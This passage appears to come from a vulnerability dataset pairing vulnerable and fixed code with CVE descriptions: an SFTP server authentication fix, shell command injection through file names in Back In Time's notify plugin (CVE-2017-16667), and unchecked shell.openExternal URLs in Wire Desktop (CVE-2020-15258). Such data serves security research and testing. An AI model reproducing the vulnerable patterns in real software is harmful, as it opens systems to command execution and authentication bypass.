ssh.CertChecker{}\n\tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n\t\treturn subtle.ConstantTimeCompare(caPublicKey.Marshal(), k.Marshal()) == 1\n\t}\n\n\t_, err = checker.Authenticate(c, clientKey)\n\treturn\n}"}, {"id": "vul_go_239_5", "commit": "6cd8a37", "file_path": "cmd/sftp-server.go", "start_line": 385, "end_line": 514, "snippet": "func startSFTPServer(args []string) {\n\tvar (\n\t\tport int\n\t\tpublicIP string\n\t\tsshPrivateKey string\n\t\tuserCaKeyFile string\n\t\tdisablePassAuth bool\n\t)\n\n\tallowPubKeys := supportedPubKeyAuthAlgos\n\tallowKexAlgos := preferredKexAlgos\n\tallowCiphers := preferredCiphers\n\tallowMACs := supportedMACs\n\tvar err error\n\n\tfor _, arg := range args {\n\t\ttokens := strings.SplitN(arg, \"=\", 2)\n\t\tif len(tokens) != 2 {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s\", arg), \"unable to start SFTP server\")\n\t\t}\n\t\tswitch tokens[0] {\n\t\tcase \"address\":\n\t\t\thost, portStr, err := net.SplitHostPort(tokens[1])\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tport, err = strconv.Atoi(portStr)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tif port < 1 || port > 65535 {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s, (port number must be between 1 to 65535)\", arg), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tpublicIP = host\n\t\tcase \"ssh-private-key\":\n\t\t\tsshPrivateKey = tokens[1]\n\t\tcase \"pub-key-algos\":\n\t\t\tallowPubKeys = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedPubKeyAuthAlgos)\n\t\tcase \"kex-algos\":\n\t\t\tallowKexAlgos = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedKexAlgos)\n\t\tcase \"cipher-algos\":\n\t\t\tallowCiphers = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedCiphers)\n\t\tcase \"mac-algos\":\n\t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n\t\tcase \"trusted-user-ca-key\":\n\t\t\tuserCaKeyFile = tokens[1]\n\t\tcase \"password-auth\":\n\t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n\t\t}\n\t}\n\n\tif port == 0 {\n\t\tport = 8022 // Default SFTP port, since no port was given.\n\t}\n\n\tif sshPrivateKey == \"\" {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is mandatory for --sftp='ssh-private-key=path/to/id_ecdsa'\"), \"unable to start SFTP server\")\n\t}\n\n\tprivateBytes, err := os.ReadFile(sshPrivateKey)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tprivate, err := ssh.ParsePrivateKey(privateBytes)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tif userCaKeyFile != \"\" {\n\t\tkeyBytes, err := os.ReadFile(userCaKeyFile)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\n\t\tcaPublicKey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\t}\n\n\t// An SSH server is represented by a ServerConfig, which holds\n\t// certificate details and handles authentication of ServerConns.\n\tsshConfig := &ssh.ServerConfig{\n\t\tConfig: ssh.Config{\n\t\t\tKeyExchanges: allowKexAlgos,\n\t\t\tCiphers: allowCiphers,\n\t\t\tMACs: allowMACs,\n\t\t},\n\t\tPublicKeyAuthAlgorithms: allowPubKeys,\n\t\tPublicKeyCallback: sshPubKeyAuth,\n\t}\n\n\tif !disablePassAuth {\n\t\tsshConfig.PasswordCallback = sshPasswordAuth\n\t} else {\n\t\tsshConfig.PasswordCallback = nil\n\t}\n\n\tsshConfig.AddHostKey(private)\n\n\thandleSFTPSession := func(channel ssh.Channel, sconn *ssh.ServerConn) {\n\t\tvar remoteIP string\n\n\t\tif host, _, err := net.SplitHostPort(sconn.RemoteAddr().String()); err == nil {\n\t\t\tremoteIP = host\n\t\t}\n\t\tserver := sftp.NewRequestServer(channel, NewSFTPDriver(sconn.Permissions, remoteIP), sftp.WithRSAllocator())\n\t\tdefer server.Close()\n\t\tserver.Serve()\n\t}\n\n\tsftpServer, err := xsftp.NewServer(&xsftp.Options{\n\t\tPublicIP: publicIP,\n\t\tPort: port,\n\t\t// OpensSSH default handshake timeout is 2 minutes.\n\t\tSSHHandshakeDeadline: 2 * time.Minute,\n\t\tLogger: new(sftpLogger),\n\t\tSSHConfig: sshConfig,\n\t\tHandleSFTPSession: handleSFTPSession,\n\t})\n\tif err != nil {\n\t\tlogger.Fatal(err, \"Unable to start SFTP Server\")\n\t}\n\n\terr = sftpServer.Listen()\n\tif err != nil {\n\t\tlogger.Fatal(err, \"SFTP Server had an unrecoverable error while accepting connections\")\n\t}\n}"}], "fix_func": [{"id": "fix_go_239_1", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 65, "end_line": 65, "snippet": "var globalSFTPTrustedCAPubkey ssh.PublicKey"}, {"id": "fix_go_239_2", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 137, "end_line": 191, "snippet": "func authenticateSSHConnection(c ssh.ConnMetadata, key ssh.PublicKey, pass []byte) (*ssh.Permissions, error) {\n\tuser, found := strings.CutSuffix(c.User(), \"=ldap\")\n\tif found {\n\t\tif !globalIAMSys.LDAPConfig.Enabled() {\n\t\t\treturn nil, errSFTPLDAPNotEnabled\n\t\t}\n\t\treturn processLDAPAuthentication(key, pass, user)\n\t}\n\n\tuser, found = strings.CutSuffix(c.User(), \"=svc\")\n\tif found {\n\t\tgoto internalAuth\n\t}\n\n\tif globalIAMSys.LDAPConfig.Enabled() {\n\t\tperms, _ := processLDAPAuthentication(key, pass, user)\n\t\tif perms != nil {\n\t\t\treturn perms, nil\n\t\t}\n\t}\n\ninternalAuth:\n\tui, ok := globalIAMSys.GetUser(context.Background(), user)\n\tif !ok {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tif globalSFTPTrustedCAPubkey != nil && pass == nil {\n\t\terr := validateClientKeyIsTrusted(c, key)\n\t\tif err != nil {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t} else {\n\t\t// Temporary credentials are not allowed.\n\t\tif ui.Credentials.IsTemp() {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t\tif subtle.ConstantTimeCompare([]byte(ui.Credentials.SecretKey), pass) != 1 {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\tcopts := map[string]string{\n\t\t\"AccessKey\": ui.Credentials.AccessKey,\n\t\t\"SecretKey\": ui.Credentials.SecretKey,\n\t}\n\tif ui.Credentials.IsTemp() {\n\t\tcopts[\"SessionToken\"] = ui.Credentials.SessionToken\n\t}\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: copts,\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "fix_go_239_3", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 193, "end_line": 320, "snippet": "func processLDAPAuthentication(key ssh.PublicKey, pass []byte, user string) (perms *ssh.Permissions, err error) {\n\tvar lookupResult *xldap.DNSearchResult\n\tvar targetGroups []string\n\n\tif pass == nil && key == nil {\n\t\treturn nil, errAuthentication\n\t}\n\n\tif pass != nil {\n\t\tsa, _, err := globalIAMSys.getServiceAccount(context.Background(), user)\n\t\tif err == nil {\n\t\t\tif subtle.ConstantTimeCompare([]byte(sa.Credentials.SecretKey), pass) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\n\t\t\treturn &ssh.Permissions{\n\t\t\t\tCriticalOptions: map[string]string{\n\t\t\t\t\t\"AccessKey\": sa.Credentials.AccessKey,\n\t\t\t\t\t\"SecretKey\": sa.Credentials.SecretKey,\n\t\t\t\t},\n\t\t\t\tExtensions: make(map[string]string),\n\t\t\t}, nil\n\t\t}\n\n\t\tif !errors.Is(err, errNoSuchServiceAccount) {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.Bind(user, string(pass))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else if key != nil {\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.LookupUserDN(user)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif lookupResult == nil {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tldapPolicies, _ := globalIAMSys.PolicyDBGet(lookupResult.NormDN, targetGroups...)\n\tif len(ldapPolicies) == 0 {\n\t\treturn nil, errSFTPUserHasNoPolicies\n\t}\n\n\tclaims := make(map[string]interface{})\n\tfor attribKey, attribValue := range lookupResult.Attributes {\n\t\t// we skip multi-value attributes here, as they cannot\n\t\t// be stored in the critical options.\n\t\tif len(attribValue) != 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tif attribKey == \"sshPublicKey\" && key != nil {\n\t\t\tkey2, _, _, _, err := ssh.ParseAuthorizedKey([]byte(attribValue[0]))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errSFTPPublicKeyBadFormat\n\t\t\t}\n\n\t\t\tif subtle.ConstantTimeCompare(key2.Marshal(), key.Marshal()) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\t\t}\n\t\t// Save each attribute to claims.\n\t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n\t}\n\n\tif key != nil {\n\t\t// If a key was provided, we expect the user to have an sshPublicKey\n\t\t// attribute.\n\t\tif _, ok := claims[ldapAttribPrefix+\"sshPublicKey\"]; !ok {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaims[expClaim] = UTCNow().Add(expiryDur).Unix()\n\tclaims[ldapUserN] = user\n\tclaims[ldapUser] = lookupResult.NormDN\n\n\tcred, err := auth.GetNewCredentialsWithMetadata(claims, globalActiveCred.SecretKey)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Set the parent of the temporary access key, this is useful\n\t// in obtaining service accounts by this cred.\n\tcred.ParentUser = lookupResult.NormDN\n\n\t// Set this value to LDAP groups, LDAP user can be part\n\t// of large number of groups\n\tcred.Groups = targetGroups\n\n\t// Set the newly generated credentials, policyName is empty on purpose\n\t// LDAP policies are applied automatically using their ldapUser, ldapGroups\n\t// mapping.\n\tupdatedAt, err := globalIAMSys.SetTempUser(context.Background(), cred.AccessKey, cred, \"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treplLogIf(context.Background(), globalSiteReplicationSys.IAMChangeHook(context.Background(), madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemSTSAcc,\n\t\tSTSCredential: &madmin.SRSTSCredential{\n\t\t\tAccessKey: cred.AccessKey,\n\t\t\tSecretKey: cred.SecretKey,\n\t\t\tSessionToken: cred.SessionToken,\n\t\t\tParentUser: cred.ParentUser,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: map[string]string{\n\t\t\t\"AccessKey\": cred.AccessKey,\n\t\t\t\"SecretKey\": cred.SecretKey,\n\t\t\t\"SessionToken\": cred.SessionToken,\n\t\t},\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "fix_go_239_4", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 322, "end_line": 348, "snippet": "func validateClientKeyIsTrusted(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n\tif globalSFTPTrustedCAPubkey == nil {\n\t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n\t}\n\n\tcert, ok := clientKey.(*ssh.Certificate)\n\tif !ok {\n\t\treturn errSftpPublicKeyWithoutCert\n\t}\n\n\t// ssh.CheckCert called by ssh.Authenticate accepts certificates\n\t// with empty principles list so we block those in here.\n\tif len(cert.ValidPrincipals) == 0 {\n\t\treturn errSftpCertWithoutPrincipals\n\t}\n\n\t// Verify that certificate provided by user is issued by trusted CA,\n\t// username in authentication request matches to identities in certificate\n\t// and that certificate type is correct.\n\tchecker := ssh.CertChecker{}\n\tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n\t\treturn subtle.ConstantTimeCompare(globalSFTPTrustedCAPubkey.Marshal(), k.Marshal()) == 1\n\t}\n\n\t_, err = checker.Authenticate(c, clientKey)\n\treturn\n}"}, {"id": "fix_go_239_5", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 394, "end_line": 523, "snippet": "func startSFTPServer(args []string) {\n\tvar (\n\t\tport int\n\t\tpublicIP string\n\t\tsshPrivateKey string\n\t\tuserCaKeyFile string\n\t\tdisablePassAuth bool\n\t)\n\n\tallowPubKeys := supportedPubKeyAuthAlgos\n\tallowKexAlgos := preferredKexAlgos\n\tallowCiphers := preferredCiphers\n\tallowMACs := supportedMACs\n\tvar err error\n\n\tfor _, arg := range args {\n\t\ttokens := strings.SplitN(arg, \"=\", 2)\n\t\tif len(tokens) != 2 {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s\", arg), \"unable to start SFTP server\")\n\t\t}\n\t\tswitch tokens[0] {\n\t\tcase \"address\":\n\t\t\thost, portStr, err := net.SplitHostPort(tokens[1])\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tport, err = strconv.Atoi(portStr)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tif port < 1 || port > 65535 {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s, (port number must be between 1 to 65535)\", arg), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tpublicIP = host\n\t\tcase \"ssh-private-key\":\n\t\t\tsshPrivateKey = tokens[1]\n\t\tcase \"pub-key-algos\":\n\t\t\tallowPubKeys = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedPubKeyAuthAlgos)\n\t\tcase \"kex-algos\":\n\t\t\tallowKexAlgos = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedKexAlgos)\n\t\tcase \"cipher-algos\":\n\t\t\tallowCiphers = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedCiphers)\n\t\tcase \"mac-algos\":\n\t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n\t\tcase \"trusted-user-ca-key\":\n\t\t\tuserCaKeyFile = tokens[1]\n\t\tcase \"disable-password-auth\":\n\t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n\t\t}\n\t}\n\n\tif port == 0 {\n\t\tport = 8022 // Default SFTP port, since no port was given.\n\t}\n\n\tif sshPrivateKey == \"\" {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is mandatory for --sftp='ssh-private-key=path/to/id_ecdsa'\"), \"unable to start SFTP server\")\n\t}\n\n\tprivateBytes, err := os.ReadFile(sshPrivateKey)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tprivate, err := ssh.ParsePrivateKey(privateBytes)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tif userCaKeyFile != \"\" {\n\t\tkeyBytes, err := os.ReadFile(userCaKeyFile)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\n\t\tglobalSFTPTrustedCAPubkey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\t}\n\n\t// An SSH server is represented by a ServerConfig, which holds\n\t// certificate details and handles authentication of ServerConns.\n\tsshConfig := &ssh.ServerConfig{\n\t\tConfig: ssh.Config{\n\t\t\tKeyExchanges: allowKexAlgos,\n\t\t\tCiphers: allowCiphers,\n\t\t\tMACs: allowMACs,\n\t\t},\n\t\tPublicKeyAuthAlgorithms: allowPubKeys,\n\t\tPublicKeyCallback: sshPubKeyAuth,\n\t}\n\n\tif !disablePassAuth {\n\t\tsshConfig.PasswordCallback = sshPasswordAuth\n\t} else {\n\t\tsshConfig.PasswordCallback = nil\n\t}\n\n\tsshConfig.AddHostKey(private)\n\n\thandleSFTPSession := func(channel ssh.Channel, sconn *ssh.ServerConn) {\n\t\tvar remoteIP string\n\n\t\tif host, _, err := net.SplitHostPort(sconn.RemoteAddr().String()); err == nil {\n\t\t\tremoteIP = host\n\t\t}\n\t\tserver := sftp.NewRequestServer(channel, NewSFTPDriver(sconn.Permissions, remoteIP), sftp.WithRSAllocator())\n\t\tdefer server.Close()\n\t\tserver.Serve()\n\t}\n\n\tsftpServer, err := xsftp.NewServer(&xsftp.Options{\n\t\tPublicIP: publicIP,\n\t\tPort: port,\n\t\t// OpensSSH default handshake timeout is 2 minutes.\n\t\tSSHHandshakeDeadline: 2 * time.Minute,\n\t\tLogger: new(sftpLogger),\n\t\tSSHConfig: sshConfig,\n\t\tHandleSFTPSession: handleSFTPSession,\n\t})\n\tif err != nil {\n\t\tlogger.Fatal(err, \"Unable to start SFTP Server\")\n\t}\n\n\terr = sftpServer.Listen()\n\tif err != nil {\n\t\tlogger.Fatal(err, \"SFTP Server had an unrecoverable error while accepting connections\")\n\t}\n}"}], "vul_patch": "--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -1 +1 @@\n-var caPublicKey ssh.PublicKey\n+var globalSFTPTrustedCAPubkey ssh.PublicKey\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -25,8 +25,8 @@\n \t\treturn nil, errNoSuchUser\n \t}\n \n-\tif caPublicKey != nil && pass == nil {\n-\t\terr := validateKey(c, key)\n+\tif globalSFTPTrustedCAPubkey != nil && pass == nil {\n+\t\terr := validateClientKeyIsTrusted(c, key)\n \t\tif err != nil {\n \t\t\treturn nil, errAuthentication\n \t\t}\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -64,7 +64,16 @@\n \t\t\t\treturn nil, errAuthentication\n \t\t\t}\n \t\t}\n+\t\t// Save each attribute to claims.\n \t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n+\t}\n+\n+\tif key != nil {\n+\t\t// If a key was provided, we expect the user to have an sshPublicKey\n+\t\t// attribute.\n+\t\tif _, ok := claims[ldapAttribPrefix+\"sshPublicKey\"]; !ok {\n+\t\t\treturn nil, errAuthentication\n+\t\t}\n \t}\n \n \texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -1,5 +1,5 @@\n-func validateKey(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n-\tif caPublicKey == nil {\n+func validateClientKeyIsTrusted(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n+\tif globalSFTPTrustedCAPubkey == nil {\n \t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n \t}\n \n@@ -19,7 +19,7 @@\n \t// and that certificate type is correct.\n \tchecker := ssh.CertChecker{}\n \tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n-\t\treturn subtle.ConstantTimeCompare(caPublicKey.Marshal(), k.Marshal()) == 1\n+\t\treturn subtle.ConstantTimeCompare(globalSFTPTrustedCAPubkey.Marshal(), k.Marshal()) == 1\n \t}\n \n \t_, err = checker.Authenticate(c, clientKey)\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -44,7 +44,7 @@\n \t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n \t\tcase \"trusted-user-ca-key\":\n \t\t\tuserCaKeyFile = tokens[1]\n-\t\tcase \"password-auth\":\n+\t\tcase \"disable-password-auth\":\n \t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n \t\t}\n \t}\n@@ -73,7 +73,7 @@\n \t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n \t\t}\n \n-\t\tcaPublicKey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n+\t\tglobalSFTPTrustedCAPubkey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n \t\tif err != nil {\n \t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16667", "cve_description": "backintime (aka Back in Time) before 1.1.24 did improper escaping/quoting of file paths used as arguments to the 'notify-send' command, leading to some parts of file paths being executed as shell commands within an os.system call in qt4/plugins/notifyplugin.py. This could allow an attacker to craft an unreadable file with a specific name to run arbitrary shell commands.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/bit-team/backintime", "patch_url": ["https://github.com/bit-team/backintime/commit/cef81d0da93ff601252607df3db1a48f7f6f01b3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_374_1", "commit": "c36d3682c40cf29713bee9a1a8735574d4e032e2", "file_path": "qt4/plugins/notifyplugin.py", "start_line": 65, "end_line": 78, "snippet": " def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n cmd = \"notify-send \"\n if timeout > 0:\n cmd = cmd + \" -t %s\" % (1000 * timeout)\n\n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n\n cmd = cmd + \" \\\"%s\\\" \\\"%s\\\"\" % (title, message)\n print(cmd)\n os.system(cmd)\n return"}], "fix_func": [{"id": "fix_py_374_1", "commit": "cef81d0da93ff601252607df3db1a48f7f6f01b3", "file_path": "qt4/plugins/notifyplugin.py", "start_line": 66, "end_line": 79, "snippet": " def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n cmd = ['notify-send']\n if timeout > 0:\n cmd.extend(['-t', str(1000 * timeout)])\n\n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n\n cmd.append(title)\n cmd.append(message)\n subprocess.Popen(cmd).communicate()\n return"}], "vul_patch": "--- a/qt4/plugins/notifyplugin.py\n+++ b/qt4/plugins/notifyplugin.py\n@@ -1,14 +1,14 @@\n def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n- cmd = \"notify-send \"\n+ cmd = ['notify-send']\n if timeout > 0:\n- cmd = cmd + \" -t %s\" % (1000 * timeout)\n+ cmd.extend(['-t', str(1000 * timeout)])\n \n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n \n- cmd = cmd + \" \\\"%s\\\" \\\"%s\\\"\" % (title, message)\n- print(cmd)\n- os.system(cmd)\n+ cmd.append(title)\n+ cmd.append(message)\n+ subprocess.Popen(cmd).communicate()\n return\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15258", "cve_description": "In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL's protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/wireapp/wire-desktop", "patch_url": ["https://github.com/wireapp/wire-desktop/commit/b3705fffa75a03f055530f55a754face5ac0623b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_192_1", "commit": "86f7820", "file_path": "electron/src/window/AboutWindow.ts", "start_line": 87, "end_line": 100, "snippet": " aboutWindow.webContents.session.webRequest.onBeforeRequest(async ({url}, callback) => {\n // Only allow those URLs to be opened within the window\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n\n // Open HTTPS links in browser instead\n if (url.startsWith('https://')) {\n await shell.openExternal(url);\n } else {\n logger.info(`Attempt to open URL \"${url}\" in window prevented.`);\n callback({redirectURL: ABOUT_HTML});\n }\n });"}, {"id": "vul_js_192_2", "commit": "86f7820", "file_path": "electron/src/main.ts", "start_line": 258, "end_line": 268, "snippet": " main.webContents.on('new-window', async (event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n\n await shell.openExternal(url);\n });"}, {"id": "vul_js_192_3", "commit": "86f7820", "file_path": "electron/src/main.ts", "start_line": 495, "end_line": 511, "snippet": " webviewProtection(): void {\n const openLinkInNewWindow = (\n event: ElectronEvent,\n url: string,\n frameName: string,\n _disposition: string,\n options: BrowserWindowConstructorOptions,\n ): Promise => {\n event.preventDefault();\n\n if (SingleSignOn.isSingleSignOnLoginWindow(frameName)) {\n return new SingleSignOn(main, event, url, options).init();\n }\n\n this.logger.log('Opening an external window from a webview.');\n return shell.openExternal(url);\n };"}, {"id": "vul_js_192_4", "commit": "86f7820", "file_path": "electron/src/menu/system.ts", "start_line": 249, "end_line": 275, "snippet": "const helpTemplate: MenuItemConstructorOptions = {\n label: `&${locale.getText('menuHelp')}`,\n role: 'help',\n submenu: [\n {\n click: () => shell.openExternal(config.legalUrl),\n label: locale.getText('menuLegal'),\n },\n {\n click: () => shell.openExternal(config.privacyUrl),\n label: locale.getText('menuPrivacy'),\n },\n {\n click: () => shell.openExternal(config.licensesUrl),\n label: locale.getText('menuLicense'),\n },\n {\n click: () => shell.openExternal(config.supportUrl),\n label: locale.getText('menuSupport'),\n },\n {\n click: () => shell.openExternal(EnvironmentUtil.web.getWebsiteUrl()),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n ],\n};"}], "fix_func": [{"id": "fix_js_192_1", "commit": "b3705ff", "file_path": "electron/src/window/AboutWindow.ts", "start_line": 88, "end_line": 106, "snippet": " aboutWindow.webContents.session.webRequest.onBeforeRequest(async ({url}, callback) => {\n // Only allow those URLs to be opened within the window\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n });\n\n // Handle the new window event in the About Window\n aboutWindow.webContents.on('new-window', (event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n\n return WindowUtil.openExternal(url, true);\n });"}, {"id": "fix_js_192_2", "commit": "b3705ff", "file_path": "electron/src/main.ts", "start_line": 257, "end_line": 264, "snippet": " main.webContents.on('new-window', async (event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }"}, {"id": "fix_js_192_3", "commit": "b3705ff", "file_path": "electron/src/main.ts", "start_line": 494, "end_line": 510, "snippet": " webviewProtection(): void {\n const openLinkInNewWindow = (\n event: ElectronEvent,\n url: string,\n frameName: string,\n _disposition: string,\n options: BrowserWindowConstructorOptions,\n ): Promise => {\n event.preventDefault();\n\n if (SingleSignOn.isSingleSignOnLoginWindow(frameName)) {\n return new SingleSignOn(main, event, url, options).init();\n }\n\n this.logger.log('Opening an external window from a webview.');\n return WindowUtil.openExternal(url);\n };"}, {"id": 